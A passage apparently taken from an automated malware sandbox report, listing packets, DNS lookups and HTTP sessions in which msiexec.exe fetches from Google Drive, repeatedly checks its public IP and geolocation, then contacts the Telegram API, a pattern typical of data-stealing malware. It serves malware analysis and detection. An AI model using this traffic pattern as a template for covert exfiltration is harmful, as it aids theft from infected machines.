                                                                            Oct 23, 2024 17:23:48.232887030 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.235740900 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.235783100 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.235793114 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.235830069 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.239028931 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.239069939 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.239097118 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.239130020 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.241894007 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.241940022 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.241965055 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.241997957 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.244438887 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.244488001 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.244501114 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.244534969 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.251621008 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.251676083 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.251704931 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.251791000 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.251801014 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.251842976 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.251848936 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.251883030 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.254379034 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.254426956 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.254439116 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.254472971 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.255866051 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.255918026 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.255928993 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.255963087 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.258734941 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.258788109 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.258799076 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.258830070 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.261226892 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.261267900 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.261298895 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.261332989 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.263993979 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.264041901 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.264064074 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.264098883 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.266731024 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.266781092 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.266791105 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.266827106 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.269347906 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.269391060 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.269434929 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.269474983 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.272102118 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.272151947 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.272162914 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.272197008 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.274763107 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.274805069 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.274835110 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.274863005 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.277180910 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.277219057 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.277232885 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.277265072 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.279835939 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.279872894 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.279906988 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.279937029 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.282411098 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.282454967 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.282506943 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.282543898 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.284818888 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.284857035 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.284867048 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.284899950 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.287502050 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.287544966 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.287554979 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.287590027 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.289940119 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:48.289992094 CEST49977443192.168.2.10142.250.185.65
                                                                            Oct 23, 2024 17:23:48.290003061 CEST44349977142.250.185.65192.168.2.10
                                                                            Oct 23, 2024 17:23:58.658042908 CEST49989443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:58.658309937 CEST49989443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:58.658323050 CEST44349989188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:58.756228924 CEST4998880192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:59.263485909 CEST44349989188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:59.265067101 CEST49989443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:59.265105009 CEST44349989188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:59.465790987 CEST44349989188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:59.466085911 CEST44349989188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:23:59.466156960 CEST49989443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:59.466523886 CEST49989443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:23:59.469415903 CEST4998880192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:59.470630884 CEST4999080192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:59.475500107 CEST8049988193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:59.475568056 CEST4998880192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:59.476005077 CEST8049990193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:23:59.476075888 CEST4999080192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:59.476228952 CEST4999080192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:23:59.481539011 CEST8049990193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:00.319535971 CEST8049990193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:00.320605040 CEST49991443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:00.320631027 CEST44349991188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:00.320692062 CEST49991443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:00.320975065 CEST49991443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:00.320986986 CEST44349991188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:00.459402084 CEST4999080192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:00.935925961 CEST44349991188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:00.937439919 CEST49991443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:00.937472105 CEST44349991188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:01.095837116 CEST44349991188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:01.095942020 CEST44349991188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:01.096015930 CEST49991443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:01.096452951 CEST49991443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:01.125804901 CEST4999080192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:01.126820087 CEST4999280192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:01.131552935 CEST8049990193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:01.131632090 CEST4999080192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:01.132270098 CEST8049992193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:01.132339001 CEST4999280192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:01.134186029 CEST4999280192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:01.139560938 CEST8049992193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:01.978270054 CEST8049992193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:01.979505062 CEST49993443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:01.979543924 CEST44349993188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:01.979609013 CEST49993443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:01.979840040 CEST49993443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:01.979856968 CEST44349993188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:02.021859884 CEST4999280192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:02.598795891 CEST44349993188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:02.600967884 CEST49993443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:02.601001024 CEST44349993188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:02.766535997 CEST44349993188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:02.766624928 CEST44349993188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:02.766680002 CEST49993443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:02.767633915 CEST49993443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:02.772936106 CEST4999280192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:02.774406910 CEST4999480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:02.778822899 CEST8049992193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:02.778902054 CEST4999280192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:02.779793024 CEST8049994193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:02.779866934 CEST4999480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:02.780071020 CEST4999480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:02.785413980 CEST8049994193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:03.615462065 CEST8049994193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:03.617264032 CEST49995443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:03.617311001 CEST44349995188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:03.617376089 CEST49995443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:03.617609024 CEST49995443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:03.617624998 CEST44349995188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:03.662590981 CEST4999480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:04.236339092 CEST44349995188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:04.248275042 CEST49995443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:04.248313904 CEST44349995188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:04.407182932 CEST44349995188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:04.407272100 CEST44349995188.114.96.3192.168.2.10
                                                                            Oct 23, 2024 17:24:04.407325983 CEST49995443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:04.407694101 CEST49995443192.168.2.10188.114.96.3
                                                                            Oct 23, 2024 17:24:04.437292099 CEST4999480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:04.443376064 CEST8049994193.122.6.168192.168.2.10
                                                                            Oct 23, 2024 17:24:04.443474054 CEST4999480192.168.2.10193.122.6.168
                                                                            Oct 23, 2024 17:24:04.444940090 CEST49996443192.168.2.10149.154.167.220
                                                                            Oct 23, 2024 17:24:04.444972038 CEST44349996149.154.167.220192.168.2.10
                                                                            Oct 23, 2024 17:24:04.445038080 CEST49996443192.168.2.10149.154.167.220
                                                                            Oct 23, 2024 17:24:04.445408106 CEST49996443192.168.2.10149.154.167.220
                                                                            Oct 23, 2024 17:24:04.445422888 CEST44349996149.154.167.220192.168.2.10
                                                                            Oct 23, 2024 17:24:05.301359892 CEST44349996149.154.167.220192.168.2.10
                                                                            Oct 23, 2024 17:24:05.301451921 CEST49996443192.168.2.10149.154.167.220
                                                                            Oct 23, 2024 17:24:05.306741953 CEST49996443192.168.2.10149.154.167.220
                                                                            Oct 23, 2024 17:24:05.306771040 CEST44349996149.154.167.220192.168.2.10
                                                                            Oct 23, 2024 17:24:05.307034969 CEST44349996149.154.167.220192.168.2.10
                                                                            Oct 23, 2024 17:24:05.311036110 CEST49996443192.168.2.10149.154.167.220
                                                                            Oct 23, 2024 17:24:05.355334044 CEST44349996149.154.167.220192.168.2.10
                                                                            Oct 23, 2024 17:24:05.561148882 CEST44349996149.154.167.220192.168.2.10
                                                                            Oct 23, 2024 17:24:05.561218977 CEST44349996149.154.167.220192.168.2.10
                                                                            Oct 23, 2024 17:24:05.561331987 CEST49996443192.168.2.10149.154.167.220
                                                                            Oct 23, 2024 17:24:05.564305067 CEST49996443192.168.2.10149.154.167.220
                                                                            Oct 23, 2024 17:24:11.291395903 CEST4998280192.168.2.10193.122.6.168
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 23, 2024 17:22:59.384814024 CEST | 192.168.2.10 | 1.1.1.1 | 0x20e6 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:00.662866116 CEST | 192.168.2.10 | 1.1.1.1 | 0x3642 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:48.864517927 CEST | 192.168.2.10 | 1.1.1.1 | 0x2f45 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:50.890582085 CEST | 192.168.2.10 | 1.1.1.1 | 0x5170 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:24:04.437218904 CEST | 192.168.2.10 | 1.1.1.1 | 0x4e28 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 23, 2024 17:22:51.739751101 CEST | 1.1.1.1 | 192.168.2.10 | 0x26bd | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | azurefd-t-fb-prod.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 23, 2024 17:22:51.739751101 CEST | 1.1.1.1 | 192.168.2.10 | 0x26bd | No error (0) | dual.s-part-0044.t-0009.fb-t-msedge.net | s-part-0044.t-0009.fb-t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 23, 2024 17:22:51.739751101 CEST | 1.1.1.1 | 192.168.2.10 | 0x26bd | No error (0) | s-part-0044.t-0009.fb-t-msedge.net | | 13.107.253.72 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:22:59.392741919 CEST | 1.1.1.1 | 192.168.2.10 | 0x20e6 | No error (0) | drive.google.com | | 142.250.185.206 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:00.671067953 CEST | 1.1.1.1 | 192.168.2.10 | 0x3642 | No error (0) | drive.usercontent.google.com | | 142.250.185.65 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:48.871829033 CEST | 1.1.1.1 | 192.168.2.10 | 0x2f45 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 23, 2024 17:23:48.871829033 CEST | 1.1.1.1 | 192.168.2.10 | 0x2f45 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:48.871829033 CEST | 1.1.1.1 | 192.168.2.10 | 0x2f45 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:48.871829033 CEST | 1.1.1.1 | 192.168.2.10 | 0x2f45 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:48.871829033 CEST | 1.1.1.1 | 192.168.2.10 | 0x2f45 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:48.871829033 CEST | 1.1.1.1 | 192.168.2.10 | 0x2f45 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:50.898956060 CEST | 1.1.1.1 | 192.168.2.10 | 0x5170 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:23:50.898956060 CEST | 1.1.1.1 | 192.168.2.10 | 0x5170 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 23, 2024 17:24:04.444411039 CEST | 1.1.1.1 | 192.168.2.10 | 0x4e28 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                            • drive.google.com
                                                                            • drive.usercontent.google.com
                                                                            • reallyfreegeoip.org
                                                                            • api.telegram.org
                                                                            • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49979 | 193.122.6.168 | 80 | 4104 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 17:23:48.881861925 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 23, 2024 17:23:49.727170944 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 15:23:49 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 17df42cb3fedb2e061f192eca8a023ab
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
Oct 23, 2024 17:23:49.730627060 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 23, 2024 17:23:49.978164911 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 15:23:49 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 2a6931270943e05d6ffce4235bebd5fb
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
Oct 23, 2024 17:23:51.716845036 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 23, 2024 17:23:51.963577032 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 15:23:51 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: e0d8659c0dfed77fe683fdfc85237dd9
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49982 | 193.122.6.168 | 80 | 4104 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 17:23:52.774347067 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 23, 2024 17:23:53.619740963 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Wed, 23 Oct 2024 15:23:53 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 32f2baf2c1b942ceccca71eb897795ec
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.1049984193.122.6.168804104C:\Windows\SysWOW64\msiexec.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 23, 2024 17:23:54.422478914 CEST151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 23, 2024 17:23:55.427388906 CEST323INHTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:55 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: ee95570c82ef1e5230bc5d087cc407a1
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>
                                                                            Oct 23, 2024 17:23:55.474670887 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:55 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: ee95570c82ef1e5230bc5d087cc407a1
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            3 | 192.168.2.10 | 49986 | 193.122.6.168 | 80 | 4104 | C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Oct 23, 2024 17:23:56.211498976 CEST | 151 | OUT | GET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 23, 2024 17:23:57.044671059 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:56 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 7c4567bda3e94de3504bfab7e7a74b49
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            4 | 192.168.2.10 | 49988 | 193.122.6.168 | 80 | 4104 | C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Oct 23, 2024 17:23:57.830698013 CEST | 151 | OUT | GET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 23, 2024 17:23:58.656635046 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:23:58 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: da7d0040c3748684018ed7279e39966d
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            5 | 192.168.2.10 | 49990 | 193.122.6.168 | 80 | 4104 | C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Oct 23, 2024 17:23:59.476228952 CEST | 151 | OUT | GET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 23, 2024 17:24:00.319535971 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:24:00 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 89711184ef68a78a09cbef5b6f864b58
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            6 | 192.168.2.10 | 49992 | 193.122.6.168 | 80 | 4104 | C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Oct 23, 2024 17:24:01.134186029 CEST | 151 | OUT | GET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Oct 23, 2024 17:24:01.978270054 CEST | 323 | IN | HTTP/1.1 200 OK
                                                                            Date: Wed, 23 Oct 2024 15:24:01 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 106
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            X-Request-ID: 0f57bacd016edbd5d86d6a71d626d4be
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.90</body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            7 | 192.168.2.10 | 49994 | 193.122.6.168 | 80 | 4104 | C:\Windows\SysWOW64\msiexec.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Oct 23, 2024 17:24:02.780071020 CEST | 151 | OUT | GET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
